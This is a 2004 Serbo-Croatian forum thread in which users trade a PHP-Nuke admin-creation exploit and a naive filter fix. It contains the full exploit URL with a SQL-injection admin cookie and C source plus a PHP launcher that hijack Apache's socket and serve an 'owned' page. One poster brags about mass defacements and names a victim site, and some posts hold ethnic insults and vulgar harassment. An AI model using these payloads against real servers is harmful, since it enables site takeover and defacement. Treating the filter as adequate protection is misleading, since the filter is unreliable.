[ albogenius @ 15.06.2004. 17:30 ] @
Pa vidi sada to je malo Stara finta pa zato evo kako da poprajete

Exploit ide nekako ovako

/AddAuthor&add_aid=AH_Crew&add_name=God&add_pwd=albhack.com...............etc.

Aali radi u php nuke 9.9 pa nadole sve drugi php nuke verzioni.

Evo kako da radite FIX ovi bug

Idete u admin.php i menite ovi redicama sa ovo,

if(stristr($_SERVER["QUERY_STRING"],'AddAuthor') || stristr($_SERVER["QUERY_STRING"],'UpdateAuthor')) die("Ovo operacija e Zabranjena");



Onda kad neko ce vas hakirati starnicom ce izaci

Ovo operacija e Zabranjena

Samo copiraj ovo koda i pastiraj na admin.php

P.S
Ako neko zna albanski mozete nagji vise za ovo Exploit u

http://www.shprastira.net/modu...thread&order=0&thold=0


By TheGenius www.shprastira.net


[Ovu poruku je menjao Gojko Vujovic dana 16.06.2004. u 19:06 GMT]
[ Danilo Cvjeticanin @ 15.06.2004. 23:02 ] @
Malo pojasni brate!
[ byTer @ 16.06.2004. 16:10 ] @
Slusajte ovaj exploit ne radi
[ albogenius @ 16.06.2004. 18:18 ] @
Jeli ne radi a sta kazes za ovo??

www.web-adresar.com.mk

i mnogo iljada stranem hahaha.

Ali ja nisam postirao celog exploita samo kazuo sam kako da se radi FIX n BUG da ne mogu drugi da vas uze GOD ADMIN u vasim php-nuke stranima.

Da ne hoces i exploit da vas kazem :(


[ annoying_master_c @ 17.06.2004. 08:22 ] @
Bas i necemo.
[ albogenius @ 17.06.2004. 19:40 ] @
Sad ima josh jedan 0 day exploita za IIS servera preku Apache greshkama da hakirash Stranu.

Ali josh je Privatan da hakiramo edno 10000 Stranima pa ce mo ga publisovati.

Regards from Just 5 Albanian Hackers Group ;)


[ _owl_ @ 17.06.2004. 20:44 ] @
bla, bla truc
Ne daj boze da neko uradi proveru prosledjenih parametara umesto die().



[ Danilo Vukovic @ 24.06.2004. 08:04 ] @
phpnuke stigo do verzije 9.9...aaauuuuuu... a meni se cini ko juce da je bio na 7.3... al je ovaj svet progresivan...



Pogledajte advisory waraxe-2004-SA#032 za vise informacija
[ albogenius @ 24.06.2004. 22:18 ] @
Ma pusti phpnuke exploita.

Sada ima novi Apachi Mustakes Server Exploit.

Invented by us.
Sada josh samo go testirame.
Ali imace goleme napada hahahah
Prva zrtva.

http://www.yugo.co.yu/

[ Lord_Sauron @ 24.06.2004. 22:50 ] @
Citat:
albogenius
Prva zrtva.

http://www.yugo.co.yu/


Eh što ne volim ovako ne l33t difejsove.

P.S. Mogli ste makar da se potrudite oko poruke (prvenstveno pravopisa)
[ chester @ 25.06.2004. 00:07 ] @
Citat:
P.S. Mogli ste makar da se potrudite oko poruke (prvenstveno pravopisa)


hehehe lolchina tj istina """This Page was been"""

H4CK3D by Sn1P3R-|)

khm khm :-))))
[ avetinja @ 26.06.2004. 19:27 ] @
albolamer - pali :))))))

http://www.waraxe.us </php-nuke exploiti

p.s. albo, a da mi tebi *editujemo* taj www.shprastira.net, sta kazes na to?
[ annoying_master_c @ 26.06.2004. 22:39 ] @
E da nemam da ucim za ovaj jebeni prijemni pridruzio bih Vam se...
[ Lord_Sauron @ 26.06.2004. 23:59 ] @
Citat:
avetinja: albolamer - pali :))))))

http://www.waraxe.us </php-nuke exploiti

p.s. albo, a da mi tebi *editujemo* taj www.shprastira.net, sta kazes na to?


I meni je isto prostrujalo kroz mozak kad sam vidio one sličice, ali nisam htio da dižem tenziju bez potrebe ( djelo dječurlije pa šta ćeš )
[ albogenius @ 27.06.2004. 20:58 ] @
Pa ako mozes zosto ne.

Ja nisam protiv hakeranje jeli to nosi u razvitak.

Razumes sta hocu da kazem.

Jel to uci ljudima da bude po profesionalnima i bolji.

More you are in dangerous.
More dangerous you are becoming.

To nosi u fantastican razvitak :)
[ avetinja @ 27.06.2004. 21:22 ] @
Pa albo,
ne razumem zasto pises sve te nebuloze?

Deface-ovanje nije "hakerizam" vec lamerizam!
Tvoj nacin je vrhunac - nasao si jedan (phpNuke) exploit i rokas sve redom.
Neki ljudi imaju pametnija posla nego da svaki dan patch-uju softver a tvoje deface-ovanje ih nikako nece uciniti profesionalnijim.

ps. jel Makedonija ima zakon protiv cyber kriminala?


...................................

edit:
Sa ovog sheeppastir sajta: (ne razumemo inferiorne jezike ali logika pomogne ;) )

Exploit eshte:

AddAuthor&add_aid=AH_Crew&add_name=God&add_pwd=albhack.com&[email protected]&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox

Per tu mbrojtur mjafton te shtoni ne admin.php poshte credits vlerat e meposhteme:

/* Mbrojtje e ofruar nga ledio1*/
if(stristr($_SERVER["QUERY_STRING"],'AddAuthor') || stristr($_SERVER["QUERY_STRING"],'UpdateAuthor')) die("Ky operacion është i ndaluar!");

.........................................

albo- jel ovo taj cuveni 0-day exploit koji neces da nam kazes?

Code:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
#include <errno.h>
#include <sys/select.h>
#include <netinet/in.h>
#include <openssl/ssl.h>

/*
* The basic actions are like this:
* 1) Become session leader
* 2) Get rid of the parent (apache)
* 3) Start handling requests
*/

#define LISTEN_DESCRIPTOR 4
#define CERTF "/var/www/html/foo-cert.pem"
#define KEYF "/var/www/html/foo-cert.pem"

static SSL_CTX *ctx;
static SSL *ssl;
static X509 *client_cert;
static SSL_METHOD *meth;

static void server_loop(int descr);
static void ssl_init(void);

int main(int argc, char *argv[])

/* Need to fork so apache doesn't kill us */
if (fork() == 0) {
/* Become session leader */
setsid();
sleep(2);

/* just in case one was a controlling tty */
close(0); close(1); close(2);
ssl_init();
server_loop(LISTEN_DESCRIPTOR);
}
else
{
sleep(1);
system("/usr/sbin/httpd -k stop");
sleep(1);
}
return 0;


static void server_loop(int descr)

struct timeval tv;
fd_set read_mask ;

FD_ZERO(&read_mask);
FD_SET(descr, &read_mask);
for (;;) {
struct sockaddr_in remote;
socklen_t len = sizeof(remote);
int fd;

if (select(descr+1, &read_mask, NULL, NULL, 0 ) == -1)
continue;
fd = accept(descr, &remote, &len);
if (fd >=0) {
char obuf[1024];
if ((ssl = SSL_new (ctx)) != NULL) {
SSL_set_fd (ssl, fd);
SSL_set_accept_state(ssl);
if ((SSL_accept (ssl)) == -1)
exit(1);

strcpy(obuf, "HTTP/1.0 200 OK\n");
strcat(obuf, "Content-Length: 40\n");
strcat(obuf, "Content-Type: text/html\n\n");
strcat(obuf, "<html><body>You're owned!</body></html>");
SSL_write (ssl, obuf, strlen(obuf));
SSL_set_shutdown(ssl,
SSL_SENT_SHUTDOWN|SSL_RECEIVED_SHUTDOWN);
SSL_free (ssl);
ERR_remove_state(0);
}
close(fd);
}
}
SSL_CTX_free (ctx); /* Never gets called */


static void ssl_init(void)

SSL_load_error_strings();
SSLeay_add_ssl_algorithms();
meth = SSLv23_server_method();
ctx = SSL_CTX_new (meth);
if (!ctx)
exit(1);
if (SSL_CTX_use_certificate_file(ctx, CERTF,
SSL_FILETYPE_PEM) <= 0)
exit(1);
if (SSL_CTX_use_PrivateKey_file(ctx, KEYF,
SSL_FILETYPE_PEM) <= 0)
exit(1);
if (!SSL_CTX_check_private_key(ctx))
exit(1);



install.php.....

<html><head>
<title>leak-sploit for PHP 4.3</title>
</head>
<body>
<?php
print('Installing exploit.
');
passthru("/var/www/html/leak-sploit");
?>
</body></html>


[ avetinja @ 28.06.2004. 21:27 ] @
Hrabri odgovori, nema sta...
LOL

Nisi mi odgovorio dali je exploit koji sam postovao ovde taj za koji si rekao da je 0-day???

Da te podsetim:

Citat:

Ma pusti phpnuke exploita.

Sada ima novi Apachi Mustakes Server Exploit.

Invented by us.
Sada josh samo go testirame.
Ali imace goleme napada hahahah
[ albogenius @ 30.06.2004. 16:31 ] @
Ne nije.

Ali ipak interesan Exploit je i ovoj sta si ga postirao.
Ali malo treba da se modificira.
Hmmm evo sada modificiram u Definicija

Citat:

define LISTEN_DESCRIPTOR 4
#define CERTF "/var/www/html/foo-cert.pem"
#define KEYF "/var/www/html/foo-cert.pem"

static SSL_CTX *ctx;
static SSL *ssl;
static X509 *client_cert;
static SSL_METHOD *meth;

Ali ipak i ovi je super exploit.
Samo treba josh malo porpravati u definicijim.
Jel ovo su za stare servere.

Hmm now you make me think DAMN.
I'm trying to modifay the #define accourding to new IIS Servers.
Thanks for Exploit Brother ;)
[ avetinja @ 30.06.2004. 18:40 ] @
Ok drago mi je da ti se dopao... o_0

Inace, jel ti radis www.shprastira.net -sajt ili neko od tvojih?
Nisam nasao nikakav kontakt email ili nesto...
[ albogenius @ 01.07.2004. 19:37 ] @
MA jeste ja imam mnogo stanima.

www.shprastira.net
www.albadownload.com
www.albahack.ru.com
www.albahackersforum.org

Ali moj kontakt je [email protected]

If you need something feel free to contakt me ;)
[ avetinja @ 01.07.2004. 21:31 ] @
Citat:

Ali moj kontakt je [email protected]


Stvarnoo? Mislio sam da je [email protected]

Inace, dobro si se ispalio...
Exploit koji sam di dao iznad i koji ti se toliko svideo je uzet sa tvog sajta shprastira.net
haaaa,haaa,haaa...

Dakle, ili ga ne radis ti ili stvarno nemas pojma o cemu pises.
Pozdrav i javi se kad imas nesto novo za nas
[ annoying_master_c @ 01.07.2004. 21:43 ] @








To LAVE!
















[ albogenius @ 02.07.2004. 08:23 ] @
Ima nesto sta sam ti tako kazao hhahahahaha.
;)
[ Barabchina @ 04.09.2004. 22:44 ] @
hE,des thegenius,vidim da te ovi nasi malo podjebavaju dobar je on lik samo je nas problem sto ne volimo puno albance zbog znas vec cega...Nista personal samo kazem..
[ LaMpiR @ 05.09.2004. 00:14 ] @
kako 9.9 zadnja verzija je 7.4?
[ annoying_master_c @ 17.09.2004. 23:26 ] @
Ma pusti dileju lupa ko Maksim po diviziji, nasli na waraxu exploit za kreiranje god admina i misle da su gadovi ( gud - ovi )...geniuses my ass.
[ Loading sys*cRasH @ 15.10.2004. 15:48 ] @
day bre ybt shta sad shto ye lik albanac on ye terorista i debil nayveci a ?!
manite decka moda se maloo qrci al ye oke ! :)
a ovay exploit za php ...
mamummu ybem mnogo dobra stvar :D
[ axez @ 17.10.2004. 14:12 ] @
Citat:
Loading sys*cRasH: day bre ybt shta sad shto ye lik albanac on ye terorista i debil nayveci a ?!
manite decka moda se maloo qrci al ye oke ! :)
a ovay exploit za php ...
mamummu ybem mnogo dobra stvar :D



A ti dobijas erekciju kad pises tako, napalis se, seksualno te uzbudjuje, garant i svrsavas u gace?
[ _SaBBaThAgER_ @ 20.10.2004. 07:07 ] @
da da... isti stari axez... :)